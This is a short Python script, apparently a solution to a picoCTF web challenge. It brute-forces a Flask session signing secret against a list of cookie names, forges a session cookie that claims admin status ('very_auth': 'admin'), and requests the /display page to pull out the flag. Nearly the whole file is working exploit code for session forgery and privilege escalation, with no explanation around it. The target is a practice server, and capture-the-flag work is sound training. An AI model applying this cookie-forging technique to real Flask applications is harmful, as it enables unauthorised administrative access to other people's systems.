import requests
import hashlib
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
from flask.json.tag import TaggedJSONSerializer
import re 

url = "http://mercury.picoctf.net:65344/"
# List of possible secrets
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", 
                "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", 
                "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", 
                "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", 
                "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

# Function to get the current session cookie
def get_session_cookie():
    return requests.get(url, allow_redirects=False).cookies.get('session')

# Function to find the secret key
def find_secret_key(cookie):
    for secret in cookie_names:
        try:
            URLSafeTimedSerializer(
                secret_key=secret,  
                salt='cookie-session',
                serializer=TaggedJSONSerializer(),
                signer=TimestampSigner,
                signer_kwargs={
                    'key_derivation' : 'hmac',
                    'digest_method' : hashlib.sha1
                }).loads(cookie)
        except BadSignature:
            continue

        return secret

    return None

# Function to generate a new session cookie
def generate_new_session(secret):
    session = {'very_auth': 'admin'}
    new_cookie = URLSafeTimedSerializer(
        secret_key=secret,
        salt='cookie-session',
        serializer=TaggedJSONSerializer(),
        signer=TimestampSigner,
        signer_kwargs={
            'key_derivation' : 'hmac',
            'digest_method' : hashlib.sha1
        }
    ).dumps(session)
    return new_cookie

# Main function to run the exploit
def exploit():
    # Get the current session cookie
    cookie = get_session_cookie()

    # Find the secret key
    secret = find_secret_key(cookie)

    # Generate a new session cookie
    new_cookie = generate_new_session(secret)

    # Send the request with the new cookie to get the flag and use regex to extract the flag from the response
    print("\nFLAG: " + re.search(r'picoCTF\{.*?\}', requests.get(url + "display", cookies={'session': new_cookie}).text).group(0))


if __name__ == "__main__":
    exploit()
